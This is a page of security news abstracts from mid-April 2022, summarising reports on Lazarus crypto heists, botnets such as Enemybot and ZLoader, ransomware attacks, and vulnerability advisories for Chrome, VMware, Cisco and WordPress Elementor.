Abstract Lazarus, the North Korea-linked APT group, is targeting organizations operating in the chemical sector in South Korea. The campaign seems to be a continuation of Operation Dream Job spotted in August 2020.

Cyware Alerts - Hacker News

April 18, 2022 – General

Benchmarking Linux Security – Latest Research Findings Full Text

Abstract How well do your Linux security practices stack up in today's challenging operating environment? Are you following the correct processes to keep systems up-to-date and protected against the latest threats? Now you can find out thanks to research independently conducted by the Ponemon Institute. The research sponsored by  TuxCare  sought to understand better how organizations are currently managing the security and stability of their Linux-based systems. The results allow all organizations operating Linux-based systems to benchmark their processes against their peers and best practices. You can get a copy of the complete report  HERE  if you can't wait to see the findings, but we've highlighted the key takeaways below if you'd like a preview. Research Goals  Understanding the current State of Enterprise Linux Security Management has never been more imperative. The number of high and critical vulnerabilities continues to grow each year significantly, and exploits aga

The Hacker News

April 18, 2022 – General

Cyber Command’s Annual Legal Conference Full Text

Abstract In March, U.S. Cyber Command held its annual legal conference, where members of the command and experts weighed in on the cyber landscape, particularly its legal and national security challenges for the U.S.

Lawfare

April 18, 2022 – Government

CISA adds VMware, Chrome flaws to its Known Exploited Vulnerabilities Catalog Full Text

Abstract US CISA adds a VMware privilege escalation flaw and a Google Chrome type confusion issue to its Known Exploited Vulnerabilities Catalog. The Cybersecurity and Infrastructure Security Agency (CISA) added a VMware privilege escalation flaw (CVE-2022-22960)...

Security Affairs

April 18, 2022 – Attack

Newly found zero-click iPhone exploit used in NSO spyware attacks Full Text

Abstract Digital threat researchers at Citizen Lab have discovered a new zero-click iMessage exploit used to install NSO Group spyware on devices belonging to Catalan politicians, journalists, and activists.

BleepingComputer

April 18, 2022 – Criminals

ZLoader C2 Servers Disrupted in Global Operation Full Text

Abstract Microsoft dismantled ZLoader networks, seizing 65 domains as its C2 servers and 319 additional domains registered using the domain generation algorithm. The botnet is used to target banks worldwide, including Brazil, Australia, and North America, to harvest financial data. It’s critical that privat ... Read More

Cyware Alerts - Hacker News

April 18, 2022 – Malware

New SolarMarker Malware Variant Using Updated Techniques to Stay Under the Radar Full Text

Abstract Cybersecurity researchers have disclosed a new version of the SolarMarker malware that packs in new improvements with the goal of updating its defense evasion abilities and staying under the radar. "The recent version demonstrated an evolution from Windows Portable Executables (EXE files) to working with Windows installer package files (MSI files)," Palo Alto Networks Unit 42 researchers  said  in a report published this month. "This campaign is still in development and going back to using executables files (EXE) as it did in its earlier versions." SolarMarker, also called Jupyter, leverages manipulated search engine optimization (SEO) tactics as its primary infection vector. It's known for its information stealing and backdoor features, enabling the attackers to steal data stored in web browsers and execute arbitrary commands retrieved from a remote server. In February 2022, the operators of SolarMarker were  observed  using stealthy Windows Registry trick

The Hacker News

April 18, 2022 – General

Apr 10 – Apr 16 Ukraine – Russia the silent cyber conflict Full Text

Abstract This post provides a timeline of the events related to the Russian invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing invasion that occurred in the previous weeks: April 16 - The unceasing...

Security Affairs

April 18, 2022 – Breach

Hackers steal $655K after picking MetaMask seed from iCloud backup Full Text

Abstract MetaMask has published a warning for their iOS users about the seeds of cryptocurrency wallets being stored in Apple's iCloud if app data backup is active.

BleepingComputer

April 18, 2022 – Attack

Enemybot and Fodcha - Leading the Next Waves of Botnet Attacks Full Text

Abstract Researchers discovered Fodcha, a growing botnet that compromises over 100 victims a day. Meanwhile, FortiGuard Labs observed a new DDoS botnet dubbed Enemybot, allegedly working with Keksec. The best way to stop/avoid such attacks is to patch any exploitable vulnerabilities in your network.

Cyware Alerts - Hacker News

April 18, 2022 – Malware

Unofficial Windows 11 upgrade installs info-stealing malware Full Text

Abstract Hackers are luring unsuspecting users with a fake Windows 11 upgrade that comes with malware that steals browser data and cryptocurrency wallets.

BleepingComputer

April 18, 2022 – Malware

New BotenaGo Variant Discovered by Nozomi Networks Labs Full Text

Abstract Researchers from Nozomi Networks Labs discovered a new variant of the Golang-based BotenaGo malware that specifically targets vulnerabilities in Lilin security camera DVR devices.

Security Boulevard

April 18, 2022 – Breach

Beanstalk DeFi platform loses $182 million in flash-load attack Full Text

Abstract The decentralized, credit-based finance system Beanstalk disclosed on Sunday that it suffered a security breach that resulted in financial losses of $182 million, the attacker stealing $80 million in crypto assets.

BleepingComputer

April 18, 2022 – Vulnerabilities

XSS vulnerability in open source tool PrivateBin patched Full Text

Abstract If a user opens a paste with a specifically crafted SVG attachment and interacts with the preview image while the instance isn’t protected by an appropriate content security policy, an attacker can also execute code.

The Daily Swig

April 18, 2022 – Government

U.S. Cyber Command gives Congress $236M unfunded priorities wish list Full Text

Abstract The wish list shared with Congress shows $236 million worth of unfunded priorities, including about $168 million to support its Cyber Mission Force, a group of 6,200 personnel charged with conducting offensive and defensive cyber operations.

CyberScoop

April 18, 2022 – Phishing

MetaMask warns Apple users over iCloud phishing attacks Full Text

Abstract In a Twitter thread posted on Monday, MetaMask noted that users run the risk of losing their funds if their Apple password “isn’t strong enough” and an attacker is able to phish their account credentials.

Coin Telegraph

April 18, 2022 – Breach

Lakeview Loan Servicing Suffered Data Breach Affecting 2.5 Million Users Full Text

Abstract The company, which claims it is the nation’s fourth-largest servicer, said in public notices the breach impacted 2,537,261 borrowers between October 27, 2021, and December 7, 2021, and was identified in early December.

National Mortgage News

April 17, 2022 – Attack

New Hacking Campaign Targeting Ukrainian Government with IcedID Malware Full Text

Abstract The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new wave of social engineering campaigns delivering IcedID malware and leveraging Zimbra exploits with the goal of stealing sensitive information. Attributing the IcedID phishing attacks to a threat cluster named UAC-0041, the agency  said  the infection sequence begins with an email containing a Microsoft Excel document (Мобілізаційний реєстр.xls or Mobilization Register.xls) that, when opened, prompts the users to enable macros, leading to the deployment of IcedID. The  information-stealing malware , also known as BokBot, has followed a similar trajectory to that of TrickBot, Emotet, and ZLoader, evolving from its earlier roots as a banking trojan to a full-fledged crimeware service that facilities the retrieval of next-stage implants such as ransomware. The  second set of targeted intrusions  relate to a new threat group dubbed UAC-0097, with the email including a number of image attachments with a  Cont

The Hacker News

April 17, 2022 – Vulnerabilities

Critical RCE Flaw Reported in WordPress Elementor Website Builder Plugin Full Text

Abstract Elementor, a WordPress website builder plugin with over five million active installations, has been found to be vulnerable to an authenticated remote code execution flaw that could be abused to take over affected websites. Plugin Vulnerabilities, which  disclosed  the flaw last week, said the bug was introduced in version 3.6.0 that was released on March 22, 2022. Roughly  37% of users  of the plugin are on version 3.6.x. "That means that malicious code provided by the attacker can be run by the website," the researchers said. "In this instance, it is possible that the vulnerability might be exploitable by someone not logged in to WordPress, but it can easily be exploited by anyone logged in to WordPress who has access to the WordPress admin dashboard." In a nutshell, the issue relates to a case of arbitrary file upload to affected websites, potentially leading to code execution. The bug has been addressed in the latest version of Elementor, with Patchstack

The Hacker News

April 17, 2022 – Botnet

Enemybot, a new DDoS botnet appears in the threat landscape Full Text

Abstract Enemybot is a DDoS botnet that targeted several routers and web servers by exploiting known vulnerabilities. Researchers from Fortinet discovered a new DDoS botnet, tracked as Enemybot, that has targeted several routers and web servers by exploiting...

Security Affairs

April 17, 2022 – Vulnerabilities

Stolen OAuth tokens used to download data from dozens of organizations, GitHub warns Full Text

Abstract GitHub reported that threat actors used stolen OAuth user tokens to exfiltrate private data from several organizations. GitHub uncovered threat actors using stolen OAuth user tokens to gain access to their repositories and download private data from...

Security Affairs

April 17, 2022 – General

Security Affairs newsletter Round 361 by Pierluigi Paganini Full Text

Abstract A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....

Security Affairs

April 16, 2022 – Criminals

New Industrial Spy stolen data market promoted through cracks, adware Full Text

Abstract Threat actors have launched a new marketplace called Industrial Spy that sells stolen data from breached companies, promoting the site through adware and software cracks.

BleepingComputer

April 16, 2022 – Breach

Newman Regional Health notifies 52,224 patients after long-running breach of employee email accounts Full Text

Abstract Newman Regional Health (NRH) is notifying more than 52,000 patients after an investigation revealed unauthorized access to a limited number of their employee e-mail accounts.

Data Breaches

April 16, 2022 – Criminals

Lazarus Group Behind $540 Million Axie Infinity Crypto Hack and Attacks on Chemical Sector Full Text

Abstract The U.S. Treasury Department has implicated the North Korea-backed Lazarus Group (aka Hidden Cobra) in the theft of $540 million from video game Axie Infinity's Ronin Network last month. On Thursday, the Treasury  tied  the Ethereum  wallet address  that received the stolen funds to the threat actor and sanctioned the funds by adding the address to the Office of Foreign Assets Control's (OFAC) Specially Designated Nationals ( SDN ) List. "The FBI, in coordination with Treasury and other U.S. government partners, will continue to expose and combat the DPRK's use of illicit activities – including cybercrime and cryptocurrency theft – to generate revenue for the regime," the intelligence and law enforcement agency  said  in a statement. The cryptocurrency heist, the second-largest cyber-enabled theft to date, involved the siphoning of 173,600 Ether (ETH) and 25.5 million USD Coins from the Ronin cross-chain bridge, which allows users to transfer their digital as

The Hacker News

April 16, 2022 – General

GitHub suspends accounts of Russian devs at sanctioned companies Full Text

Abstract Russian software developers are reporting that their GitHub accounts are being suspended without warning if they work for or previously worked for companies under US sanctions.

BleepingComputer

April 16, 2022 – Education

Get Lifetime Access to This 60-Hour Java Programming Training Bundle @ 97% Discount Full Text

Abstract Java  is a very versatile programming language. From Android apps to Oracle databases, it can be used to power a wide range of software and systems. As with most  technical skills , the best way to learn Java is through building your own projects. But you can definitely speed things up with high-quality training. The Complete 2022 Java Coder Bundle  provides plenty of that — nine full-length video courses, in fact. The training comes from top-rated instructors, and you get plenty of hands-on projects to try. The included training is worth $1,791. But in a special deal for loyal readers of The Hacker News, you can pick up the bundle for just $39.99.  Special Offer — For a limited time, you can get unlimited lifetime access to over 60 hours of Java training for  just $39.99 . That's an unmissable deal! According to Indeed, the average salary for a Java developer in the US is around $115,000 a year. But even if you don't plan on becoming a specialist, learning Java is a smart move. T

The Hacker News

April 16, 2022 – APT

U.S. Gov believes North Korea-linked Lazarus APT is behind Ronin Validator cyber heist Full Text

Abstract The U.S. government blames North Korea-linked APT Lazarus for the recent $600 million Ronin Validator cyber heist. The U.S. government attributes the recent $600 million Ronin Validator cryptocurrencty heist to the North Korea-linked APT Lazarus. The...

Security Affairs

April 16, 2022 – Attack

The unceasing action of Anonymous against Russia Full Text

Abstract This week the Anonymous collective and its affiliates have targeted multiple Russian organizations stealing gigabytes of data. This week Anonymous and other hacker groups affiliated with the collective have launched multiple attacks against Russian...

Security Affairs

April 16, 2022 – Attack

Threat actors target the Ukrainian gov with IcedID malware Full Text

Abstract Threat actors are targeting Ukrainian government agencies with phishing attacks delivering the IcedID malware. The Ukrainian Computer Emergency Response Team (CERT-UA) uncovered new phishing campaigns aimed at infecting systems of Ukrainian government...

Security Affairs

April 15, 2022 – Breach

GitHub Says Hackers Breached Dozens of Organizations Using Stolen OAuth Access Tokens Full Text

Abstract Cloud-based repository hosting service GitHub on Friday revealed that it discovered evidence of an unnamed adversary capitalizing on stolen OAuth user tokens to unauthorizedly download private data from several organizations. "An attacker abused stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI, to download data from dozens of organizations, including NPM," GitHub's Mike Hanley  disclosed  in a report. OAuth access tokens are often  used  by apps and services to authorize access to specific parts of a user's data and communicate with each other without having to share the actual credentials. It's one of the most common methods used to pass authorization from a single sign-on ( SSO ) service to another application. As of April 15, 2022, the list of affected OAuth applications is as follows - Heroku Dashboard (ID: 145909) Heroku Dashboard (ID: 628778) Heroku Dashboard – Preview (ID: 313468) Heroku Dashboard – Classi

The Hacker News

April 15, 2022 – Breach

GitHub: Attacker breached dozens of orgs using stolen OAuth tokens Full Text

Abstract GitHub revealed today that an attacker is using stolen OAuth user tokens (issued to Heroku and Travis-CI) to download data from private repositories.

BleepingComputer

April 15, 2022 – Attack

Spanish FA report cyber attack to police after email accounts, private texts stolen Full Text

Abstract Documents and information from email accounts, private texts, and audio conversations from top executives of the federation, including president Luis Rubiales, have been stolen in recent months.

ESPN

April 15, 2022 – Vulnerabilities

JekyllBot:5 Flaws Let Attackers Take Control of Aethon TUG Hospital Robots Full Text

Abstract As many as five security vulnerabilities have been addressed in Aethon Tug hospital robots that could enable remote attackers to seize control of the devices and interfere with the timely distribution of medication and lab samples. "Successful exploitation of these vulnerabilities could cause a denial-of-service condition, allow full control of robot functions, or expose sensitive information," the U.S. Cybersecurity and Infrastructure Security Agency (CISA)  said  in an advisory published this week. Aethon TUG smart autonomous mobile robots are used in hospitals around the world to deliver medication, transport clinical supplies, and independently navigate around to perform different tasks such as cleaning floors and collecting meal trays. Collectively dubbed " JekyllBot:5 " by Cynerio, the flaws reside in the TUG Homebase Server component, effectively allowing attackers to impede the delivery of medications, surveil patients, staff, and hospital interiors thr

The Hacker News

April 15, 2022 – Attack

Threat actors use Zimbra exploits to target organizations in Ukraine Full Text

Abstract Threat actors are targeting Ukrainian government organizations with exploits for XSS vulnerabilities in Zimbra Collaboration Suite (CVE-2018-6882). Ukraine's CERT (CERT-UA) warns of threat actors that are targeting government organizations with exploits...

Security Affairs

April 15, 2022 – Ransomware

The Week in Ransomware - April 15th 2022 - Encrypting Russia Full Text

Abstract While countries worldwide have been the frequent target of ransomware attacks, Russia and CIS countries have been avoided by threat actors. The tables have turned with the NB65 hacking group modifying the leaked Conti ransomware to use in attacks on Russian entities.

BleepingComputer

April 15, 2022 – Attack

Attack on Panasonic Canada Shows Conti is Still Dangerous Full Text

Abstract While the details remain sparse, Panasonic suffered another breach just six months after a high-profile attack—this time at Panasonic Canada. The Conti gang said it was behind the February attack that resulted in the theft of more than 2.8GB of data.

Security Boulevard

April 15, 2022 – Criminals

Haskers Gang Gives Away ZingoStealer Malware to Other Cybercriminals for Free Full Text

Abstract A crimeware-related threat actor known as Haskers Gang has released an  information-stealing malware  called ZingoStealer for free on, allowing other criminal groups to leverage the tool for nefarious purposes. "It features the ability to steal sensitive information from victims and can download additional malware to infected systems," Cisco Talos researchers Edmund Brumaghin and Vanja Svajcer  said  in a report shared with The Hacker News. "In many cases, this includes the  RedLine Stealer  and an XMRig-based cryptocurrency mining malware that is internally referred to as 'ZingoMiner.'" But in an interesting twist, the criminal group announced on Thursday that the ownership of the ZingoStealer project is changing hands to a new threat actor, in addition to offering to sell the source code for a negotiable price of $500. Since its inception last month, ZingoStealer is said to be undergoing consistent development and deployed specifically against Russi

The Hacker News

April 15, 2022 – Criminals

Conti Ransomware Gang claims responsibility for the Nordex hack Full Text

Abstract The Conti ransomware gang has claimed responsibility for the recent attack against Nordex, one of the largest manufacturers of wind turbines. The Conti ransomware gang claimed responsibility for the cyberattack that hit the manufacturer of wind turbines...

Security Affairs

April 15, 2022 – Phishing

T-Mobile customers warned of unblockable SMS phishing attacks Full Text

Abstract An ongoing phishing campaign targets T-Mobile customers with malicious links using unblockable texts sent via SMS (Short Message Service) group messages.

BleepingComputer

April 15, 2022 – Vulnerabilities

Critical Vulnerability in Elementor Plugin Impacts Millions of WordPress Sites Full Text

Abstract A critical vulnerability addressed in the Elementor WordPress plugin could allow authenticated users to upload arbitrary files to affected websites, potentially leading to code execution.

Security Week

April 15, 2022 – Criminals

ZingoStealer crimeware released for free in the cybercrime ecosystem Full Text

Abstract A new powerful crimeware called ZingoStealer was released for free by a threat actor known as Haskers Gang. ZingoStealer is a new information-stealer developed by a threat actor known as Haskers Gang who released it for free after they attempted...

Security Affairs

April 15, 2022 – Vulnerabilities

Cisco vulnerability lets hackers craft their own login credentials Full Text

Abstract Cisco has released a security advisory to warn about a critical vulnerability (CVSS v3 score: 10.0), tracked as CVE-2022-20695, impacting the Wireless LAN Controller (WLC) software. 

BleepingComputer

April 15, 2022 – Ransomware

Analysis of the SunnyDay ransomware Full Text

Abstract Segurança-Informatica published an analysis of a recent sample of SunnyDay ransomware. As a result of the work, some similarities between other ransomware samples such as Ever101, Medusa Locker, Curator, and Payment45 were found.

Security Affairs

April 15, 2022 – Vulnerabilities

Auth bypass flaw in Cisco Wireless LAN Controller Software allows device takeover Full Text

Abstract Cisco fixed a critical flaw in Cisco Wireless LAN Controller (WLC) that could allow an unauthenticated, remote attacker to take control affected devices. Cisco has released security patches to fix a critical vulnerability (CVSS score 10), tracked...

Security Affairs

April 15, 2022 – Government

CISA orders agencies to fix actively exploited VMware, Chrome bugs Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) has added nine more security flaws to its list of actively exploited bugs, including a VMware privilege escalation flaw and a Google Chrome zero-day that could be used for remote code execution.

BleepingComputer

April 15, 2022 – Criminals

North Korea’s Lazarus Group Stole More than $600 Million in a Single Hack Targeting Axie Infinity Full Text

Abstract The FBI has blamed hackers associated with the North Korean government for stealing more than $600 million in cryptocurrency last month from a video gaming company -- the latest in a string of audacious cyber heists tied to Pyongyang.

CNN Money

April 15, 2022 – Vulnerabilities

Google fixed third zero-day in Chrome since the start of 2022 Full Text

Abstract Google Chrome 100.0.4896.127 addresses a new high-severity zero-day vulnerability tracked as CVE-2022-1364, actively exploited by threat actors in the wild. Google has released Chrome 100.0.4896.127 for Windows, Mac, and Linux to address a high-severity...

Security Affairs

April 15, 2022 – Cryptocurrency

Cryptocurrency DeFi platforms are now more targeted than ever Full Text

Abstract Hackers are increasingly targeting DeFi (Decentralized Finance) cryptocurrency platforms, with Q1 2022 data showing that more platforms are being targeted than ever before.

BleepingComputer

April 15, 2022 – Vulnerabilities

Cisco’s Webex phoned home audio telemetry even when muted Full Text

Abstract Researchers at two US universities have found that muting popular native video-conferencing apps fails to disable device microphones – and that these apps have the ability to access audio data when muted, or actually do so.

The Register

April 15, 2022 – General

Ways to Develop a Cybersecurity Training Program for Employees Full Text

Abstract Cybersecurity experts would have you believe that your organization’s employees have a crucial role in bolstering or damaging your company's security initiatives. While you may disagree, data breach studies show that employees and negligence are the most...

Security Affairs

April 15, 2022 – Privacy

‘Mute’ button in conferencing apps may not actually mute your mic Full Text

Abstract A new study shows that pressing the mute button on popular video conferencing apps (VCA) may not actually work like you think it should, with apps still listening in on your microphone.

BleepingComputer

April 15, 2022 – Malware

Pipedream, an extremely versatile malware toolkit, could be used for targeting power grids, refineries, and other ICS systems Full Text

Abstract The United States government has issued an advisory for the malware toolkit dubbed Pipedream that cybercriminal groups could use to potentially target all critical infrastructure owners worldwide.

ARS Technica

April 15, 2022 – Ransomware

Analysis of the SunnyDay ransomware Full Text

Abstract The analysis of a recent sample SunnyDay ransomware revealed some similarities with other ransomware, such as Ever101, Medusa Locker, Curator, and Payment45. Segurança-Informatica published an analysis of a recent sample of SunnyDay ransomware. As a result...

Security Affairs

April 15, 2022 – Criminals

Karakurt revealed as data extortion arm of Conti cybercrime syndicate Full Text

Abstract After breaching servers managed by the cybercriminals, security researchers found a connection between Conti ransomware and the recently emerged Karakurt data extortion group, showing that the two gangs are part of the same operation.

BleepingComputer

April 14, 2022 – Vulnerabilities

Critical Auth Bypass Bug Reported in Cisco Wireless LAN Controller Software Full Text

Abstract Cisco has released patches to contain a critical security vulnerability affecting the Wireless LAN Controller (WLC) that could be abused by an unauthenticated, remote attacker to take control of an affected system. Tracked as  CVE-2022-20695 , the issue has been rated 10 out of 10 for severity and enables an adversary to bypass authentication controls and log in to the device through the management interface of WLC. "This vulnerability is due to the improper implementation of the password validation algorithm," the company said in an advisory. "An attacker could exploit this vulnerability by logging in to an affected device with crafted credentials." Successful exploitation of the flaw could permit an attacker to gain administrator privileges and carry out malicious actions in a manner that allows a complete takeover of the vulnerable system. The company stressed that the issue only affects the following products if running Cisco WLC Software Release 8.10.151.

The Hacker News

April 14, 2022 – General

As State-Backed Cyber Threats Grow, Here’s How the World Is Reacting Full Text

Abstract With the ongoing conflict in Eurasia, cyberwarfare is inevitably making its presence felt. The fight is not only being fought on the fields. There is also a big battle happening in cyberspace. Several cyber-attacks have been reported over the past months. Notably, cyber attacks backed by state actors are becoming prominent. There have been reports of a rise of ransomware and other malware attacks such as  Cyclops Blink ,  HermeticWiper , and  BlackCat . These target businesses as well as government institutions and nonprofit organizations. There have been cases of several attempts to shut down online communications and IT infrastructure. The ongoing list of  significant cyber incidents  curated by the Center for Strategic and International Studies (CSIS) shows that the number of major incidents in January 2022 is 100% higher compared to the same period in the previous year. With the recent activities in cyberspace impacted by the emergence of the geopolitical tumult in February, it

The Hacker News

April 14, 2022 – Vulnerabilities

Critical VMware Cloud Director Bug Could Let Hackers Takeover Entire Cloud Infrastructure Full Text

Abstract Cloud computing and virtualization technology firm VMWare on Thursday rolled out an update to resolve a critical security flaw in its Cloud Director product that could be weaponized to launch remote code execution attacks. The issue, assigned the identifier  CVE-2022-22966 , has a CVSS score of 9.1 out of a maximum of 10. VMware credited security researcher Jari Jääskelä with reporting the flaw. "An authenticated, high privileged malicious actor with network access to the VMware Cloud Director tenant or provider may be able to exploit a remote code execution vulnerability to gain access to the server," VMware  said  in an advisory. VMware Cloud Director, formerly known as vCloud Director, is used by many well-known cloud providers to operate and manage their cloud infrastructures and gain visibility into datacenters across sites and geographies. The vulnerability could, in other words, end up allowing attackers to gain access to sensitive data and take over private clou

The Hacker News

April 14, 2022 – Vulnerabilities

Google Releases Urgent Chrome Update to Patch Actively Exploited Zero-Day Flaw Full Text

Abstract Google on Thursday shipped emergency patches to address two security issues in its Chrome web browser, one of which it says is being actively exploited in the wild. Tracked as  CVE-2022-1364 , the tech giant described the high-severity bug as a case of type confusion in the V8 JavaScript engine. Clément Lecigne of Google's Threat Analysis Group has been credited with reporting the flaw on April 13, 2022. As is typically the case with actively exploited zero-day flaws, the company acknowledged it's "aware that an exploit for CVE-2022-1364 exists in the wild." Additional details about the flaw and the identity of the threat actors have been withheld to prevent further abuse. With the latest fix, Google has patched a total of three zero-day vulnerabilities in Chrome since the start of the year. It's also the second type confusion-related bug in V8 to be squashed in less than a month - CVE-2022-0609  - Use-after-free in Animation CVE-2022-1096  - Type confusio

The Hacker News

April 14, 2022 – Criminals

Instagram’s dark side: sexual harassers, crypto scammers, ID thieves Full Text

Abstract A platform for everyone to seamlessly share their best moments online, Instagram is slowly turning into a mecca for the undesirables—from sexual harassers to crypto "investors" helping you "get rich fast." How do you keep yourself safe against such profiles?

BleepingComputer

April 14, 2022 – Attack

Wind turbine firm Nordex hit by Conti ransomware attack Full Text

Abstract The Conti ransomware operation has claimed responsibility for a cyberattack on wind turbine giant Nordex, which was forced to shut down IT systems and remote access to the managed turbines earlier this month.

BleepingComputer

April 14, 2022 – Business

Obsidian Security Raises $90 Million Series C Round to Cement its Leadership in SaaS Security Full Text

Abstract The funding was led by Menlo Ventures, Norwest Venture Partners, and IVP, with participation from existing investors Greylock, Wing, and GV. Obsidian will add Menlo Ventures Partner Venky Ganesan to its board of directors.

Yahoo Finance

April 14, 2022 – Policy and Law

Ethereum Developer Jailed 63 Months for Helping North Korea Evade Sanctions Full Text

Abstract A U.S. court has sentenced former Ethereum developer Virgil Griffith to five years and three months in prison and pay a $100,000 fine for conspiring with North Korea to help use cryptocurrencies to circumvent sanctions imposed on the country. "There is no question North Korea poses a national security threat to our nation, and the regime has shown time and again it will stop at nothing to ignore our laws for its own benefit," U.S. Attorney Damian Williams  said  in a statement. The sentencing comes more than six months after Griffith  pleaded guilty  to violating the International Emergency Economic Powers Act ( IEEPA ) by offering technical advice to the hermit kingdom with regards to the use of digital currency to bypass economic restrictions. Griffith was arrested in November 2019. North Korea is known to  rely on   cryptocurrency heists  to get around international sanctions and use it to help fund programs to build weapons of mass destruction. Indeed, the nation-st

The Hacker News

April 14, 2022 – Government

Cyberspace and War in Ukraine: Prepare for Worse Full Text

Abstract Russia’s relatively weaker position within the global financial system has limited Putin’s punitive options in response to Western economic and financial sanctions. Cyberspace offers attractive alternative options for hackers and security planners in Moscow.

Lawfare

April 14, 2022 – Government

US gov agencies e private firms warn nation-state actors are targeting ICS & SCADA devices Full Text

Abstract The US government agencies warned of threat actors that are targeting ICS and SCADA systems from various vendors. The Department of Energy (DOE), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the Federal...

Security Affairs

April 14, 2022 – APT

Feds: APTs Have Tools That Can Take Over Critical Infrastructure Full Text

Abstract Threat actors have developed custom modules to compromise various ICS devices as well as Windows workstations that pose an imminent threat, particularly to energy providers.

Threatpost

April 14, 2022 – Vulnerabilities

Critical Windows RPC CVE-2022-26809 flaw raises concerns — Patch now Full Text

Abstract Microsoft has fixed a new Windows RPC CVE-2022-26809 vulnerability that is raising concerns among security researchers due to its potential for widespread, significant cyberattacks once an exploit is developed. Therefore, all organization needs to apply Windows security updates as soon as possible.

BleepingComputer

April 14, 2022 – Vulnerabilities

Experts warn of concerns around Microsoft RPC bug Full Text

Abstract Windows hosts running the Server Message Block protocol (SMB protocol) are vulnerable to this bug. SMB protocols allow users to share access to files and tools on remote servers.

The Record

April 14, 2022 – Cryptocurrency

Rarible NFT Marketplace Flaw Could’ve Let Attackers Hijack Crypto Wallets Full Text

Abstract Cybersecurity researchers have disclosed a now-fixed security flaw in the Rarible non-fungible token (NFT) marketplace that, if successfully exploited, could have led to account takeover and theft of cryptocurrency assets. "By luring victims to click on a malicious NFT, an attacker can take full control of the victim's crypto wallet to steal funds," Check Point researchers Roman Zaikin, Dikla Barda, and Oded Vanunu  said  in a report shared with The Hacker News. Rarible, an NFT marketplace that enables users to create, buy, and sell digital NFT art like photographs, games, and memes, has over 2.1 million active users. "There is still a huge gap between, in terms of security, between Web2 and Web3 infrastructure," Vanunu, head of products vulnerabilities research at Check Point, said in a statement shared with The Hacker News. "Any small vulnerability can possibly allow cyber criminals to hijack crypto wallets behind the scenes. We are still in a st

The Hacker News

April 14, 2022 – Government

CISA adds Windows CLFS Driver Privilege Escalation flaw to its Known Exploited Vulnerabilities Catalog Full Text

Abstract The U.S. CISA added the CVE-2022-24521 Microsoft Windows CLFS Driver Privilege Escalation Vulnerability to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2022-24521 privilege...

Security Affairs

April 14, 2022 – Government

FBI: Payment app users targeted in social engineering attacks Full Text

Abstract Cybercriminals are attempting to trick American users of digital payment apps into making instant money transfers in social engineering attacks using text messages with fake bank fraud alerts.

BleepingComputer

April 14, 2022 – Government

CISA Issues Warning About Malicious Tools Targeting ICS/SCADA Devices Full Text

Abstract The advisory highlights that OPC Unified Architecture (OPC UA) servers and multiple versions of Programmable Logic Controllers (PLCs) from Schneider Electric, and OMRON are vulnerable to such attacks. 

Cyware Alerts - Hacker News

April 14, 2022 – Botnet

New EnemyBot DDoS Botnet Borrows Exploit Code from Mirai and Gafgyt Full Text

Abstract A threat group that pursues crypto mining and distributed denial-of-service (DDoS) attacks has been linked to a new botnet called Enemybot, which has been discovered enslaving routers and Internet of Things (IoT) devices since last month. "This botnet is mainly derived from  Gafgyt 's source code but has been observed to borrow several modules from  Mirai 's original source code," Fortinet FortiGuard Labs  said  in a report this week. The botnet has been attributed to an actor named Keksec (aka  Kek Security , Necro, and  FreakOut ), which has been linked to multiple botnets such as  Simps ,  Ryuk  (not to be confused with the ransomware of the same name), and  Samael , and has a history of targeting cloud infrastructure to carry out crypto mining and DDoS operations. Primarily targeting routers from Seowon Intech, D-Link, and iRZ to propagate its infections and grow in volume, an analysis of the malware specimen has highlighted Enemybot's obfuscation attemp

The Hacker News

April 14, 2022 – Vulnerabilities

Critical VMware Workspace ONE Access CVE-2022-22954 flaw actively exploited Full Text

Abstract Threat actors are actively exploiting a critical vulnerability in VMware Workspace ONE Access and Identity Manager recently patched by the vendor. Threat actors are actively exploiting a critical flaw, tracked as CVE-2022-22954, in VMware Workspace...

Security Affairs

April 14, 2022 – Vulnerabilities

Google Chrome emergency update fixes zero-day used in attacks Full Text

Abstract Google has released Chrome 100.0.4896.127 for Windows, Mac, and Linux, to fix a high-severity zero-day vulnerability actively used by threat actors in attacks.

BleepingComputer

April 14, 2022 – Phishing

Campaign Similar to Operation Kitty Phishing Found Targeting South Koreans Full Text

Abstract According to researchers, the campaign was first observed in April and aims to steal data from individuals in South Korea. They are targeted via spear-phishing emails that include malicious Word documents.

Cyware Alerts - Hacker News

April 14, 2022 – Botnet

Microsoft Disrupts ZLoader Cybercrime Botnet in Global Operation Full Text

Abstract Microsoft and a consortium of cybersecurity companies took legal and technical steps to disrupt the ZLoader botnet , seizing control of 65 domains that were used to control and communicate with the infected hosts. "ZLoader is made up of computing devices in businesses, hospitals, schools, and homes around the world and is run by a global internet-based organized crime gang operating malware as a service that is designed to steal and extort money," Amy Hogan-Burney, general manager of Microsoft's Digital Crimes Unit (DCU),  said . The operation, Microsoft said, was undertaken in collaboration with ESET, Lumen's Black Lotus Labs, Palo Alto Networks Unit 42, Avast, Financial Services Information Sharing and Analysis Center (FS-ISAC), and Health Information Sharing and Analysis Center (H-ISAC). As a result of the disruption, the domains are now redirected to a sinkhole, effectively preventing the botnet's criminal operators from contacting the compromised devices.

The Hacker News

April 14, 2022 – Botnet

Microsoft has taken legal and technical action to dismantle the Zloader botnet Full Text

Abstract Microsoft's Digital Crimes Unit (DCU) announced to have shut down dozens C2 servers used by the infamous ZLoader botnet. Microsoft dismantled the C2 infrastructure used by the ZLoader trojan with the help of telecommunications providers around the world...

Security Affairs

April 14, 2022 – Malware

Windows 11 tool to add Google Play secretly installed malware Full Text

Abstract A popular Windows 11 ToolBox script used to add the Google Play Store to the Android Subsystem has secretly infected users with malicious scripts, Chrome extensions, and potentially other malware.

BleepingComputer

April 14, 2022 – Malware

Hafnium’s New Malware Hides Behind Scheduled Tasks Full Text

Abstract Microsoft linked the Chinese-backed Hafnium group to a defense evasion malware Tarrask used by cybercriminals to attain persistence on compromised Windows environments. Researchers uncovered a recent malicious activity wherein hackers abused an unpatched zero-day vulnerability for their initia ... Read More

Cyware Alerts - Hacker News

April 14, 2022 – Vulnerabilities

Microsoft increases awards for high-impact Microsoft 365 bugs Full Text

